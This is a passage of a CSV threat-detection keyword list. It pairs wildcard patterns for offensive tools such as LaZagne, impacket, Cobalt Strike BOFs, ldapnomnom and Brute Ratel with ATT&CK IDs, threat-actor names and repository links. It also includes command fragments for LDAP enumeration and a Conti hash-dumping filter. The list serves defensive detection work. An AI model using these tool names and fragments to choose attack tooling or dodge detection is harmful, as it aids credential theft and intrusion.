T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*LaunchExploitMode.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*LAUNCHING GPODDITY SMB SERVER AND WAITING FOR GPO REQUESTS*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*LaunchPreCompromise.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*layer8secure/SilentHound*","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/layer8secure/SilentHound","1","1","N/A","N/A","5","430","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" +"*Lazagne*Passwords.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*laZagne.exe browsers*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*Lazagne.exe*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. 
Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*laZagne.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" +"*Lazagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*LaZagneForensic*","offensive_tool_keyword","LaZagneForensic","Windows passwords decryption from dump files","T1003 - T1081 - T1082","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagneForensic","1","1","N/A","N/A","5","450","114","2023-02-02T16:36:21Z","2018-02-01T15:44:31Z" +"*LaZagne-master.zip*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*lazynmap.sh*","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . 
install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","1","N/A","N/A","4","350","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" +"*lazypariah *","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","0","N/A","N/A","2","136","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" +"*lazypariah.svg*","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","1","N/A","N/A","2","136","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" +"*lcmammnjlbmlbcaniggmlejfjpjagiia*","greyware_tool_keyword","Adblock Office VPN Proxy Server","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*ldap_enums.go*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*ldap_shell.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*ldapasn1.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ldapattack.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*ldapattack.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ldapdomaindump*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" +"*LDAPDomainDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ldapfilter:*admincount=1* /format:hashcat*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. 
As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*LdapMiner*","offensive_tool_keyword","ldapminer","This is a tool I wrote to collect information from different LDAP Server implementation. This was written in C with the Netscape C","T1016 - T1018 - T1021 - T1046 - T1056 - T1069 - T1078 - T1087 - T1114 - T1482 - T1526 - T1597","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Information Gathering","https://sourceforge.net/projects/ldapminer/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ldapnomnom --input*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-darwin-*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation 
Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-linux-*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-main*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-windows-386.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-windows-amd64.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*ldapnomnom-windows-arm64.exe*","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0001 - TA0007","N/A","N/A","Exploitation 
Tools","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","7","697","61","2023-03-31T16:18:14Z","2022-09-18T10:35:09Z" +"*LDAP-Password-Hunter*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","10","2","189","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" +"*ldaprelayclient.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*ldaprelayclient.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*LdapRelayScan.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*LdapRelayScan.py*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","N/A","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*LdapRelayScan-main*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*ldapsearch * ldap://*","greyware_tool_keyword","ldapsearch","ldapsearch to 
enumerate ldap","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://man7.org/linux/man-pages/man1/ldapsearch.1.html","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*ldapsearch -x -h * -s base*","greyware_tool_keyword","ldapsearch","ldapsearch to enumerate ldap","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://man7.org/linux/man-pages/man1/ldapsearch.1.html","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*ldapsearchad.py*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" +"*ldapsearch-ad.py*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" +"*ldap-searcher *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*ldapsentinel * raw *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*ldapsentinel forest user*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*LdapSignCheck.exe*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" +"*LdapSignCheck.Natives*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" +"*LdapSignCheck.sln*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" +"*ldapsigncheck.x64.*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
